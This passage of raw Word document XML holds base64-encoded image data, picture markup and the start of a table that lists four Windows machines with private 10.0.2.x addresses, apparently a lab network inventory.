10;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&#10;BgAAAAAHAAcAvgEAAH1BAAAAAA==&#10;">
                <v:shape id="Picture 36" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:8515;top:337;width:807;height:8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JGMlwQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9da8Iw&#10;FH0f+B/CFfY20wnKqEZxm8IYOLAK+nhprk21uSlNZrN/vzwIPh7O93wZbSNu1PnasYLXUQaCuHS6&#10;5krBYb95eQPhA7LGxjEp+CMPy8XgaY65dj3v6FaESqQQ9jkqMCG0uZS+NGTRj1xLnLiz6yyGBLtK&#10;6g77FG4bOc6yqbRYc2ow2NKHofJa/FoFun+P0/W2wuJ7HJvJyVz08edTqedhXM1ABIrhIb67v7SC&#10;SVqfvqQfIBf/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALokYyXBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;">
                  <v:imagedata r:id="rId26" o:title=""/>
                </v:shape>
                <v:shape id="Picture 35" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:8334;top:306;width:1934;height:11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X4NxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5QnezCZapaSuUgqCHor4p/fX7DOJZt+m2Y1GP70rCD0OM/MbZjrvTCXO1LjSsoIkikEQ&#10;Z1aXnCvY7xaDdxDOI2usLJOCKzmYz15fpphqe+ENnbc+FwHCLkUFhfd1KqXLCjLoIlsTB+9gG4M+&#10;yCaXusFLgJtKDuN4Ig2WHBYKrOmroOy0bY2C422VXFtcj9bfuWyz4fLt9+/HKtXvdZ8fIDx1/j/8&#10;bC+1gnECjy/hB8jZHQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEm9fg3EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId27" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA57B6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C63C7B2" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF0C4B1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B689A6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8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18"/>
        <w:gridCol w:w="2318"/>
        <w:gridCol w:w="2013"/>
        <w:gridCol w:w="2366"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D02F84" w14:paraId="04B8F36F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CB8CDC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="455"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win 7 (Opt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25E78873" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="458"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win Sr 2012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E6A63EB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="305" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win Sr 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1287F46F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="661" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D02F84" w14:paraId="606F8CBE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="465FAA23" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F0EDF1F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5892A35E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="304" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9237B3" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="660" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D02F84" w14:paraId="3A4AC966" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="518"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32773023" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:b/>
